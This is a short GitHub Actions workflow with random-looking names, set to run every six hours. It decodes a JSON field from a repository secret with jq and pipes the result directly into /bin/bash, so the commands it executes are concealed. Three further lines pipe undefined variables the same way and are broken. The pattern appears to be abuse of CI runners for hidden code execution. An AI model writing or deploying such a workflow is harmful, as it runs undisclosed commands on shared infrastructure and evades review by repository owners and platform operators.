name: qiuminggang6152
on:
  workflow_dispatch:
  schedule:
    - cron: '55 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qiuminggang6152
        env:
          w35: ${{ secrets.w35 }}
        run: |
          echo $w35 | jq -r .llc7121 | /bin/bash
          echo $rpwf4 | jq -r .quhri61992 | /bin/bash
          echo $daunn48843 | jq -r .l76 | /bin/bash
          echo $bqbwb19 | jq -r .veln3372 | /bin/bash

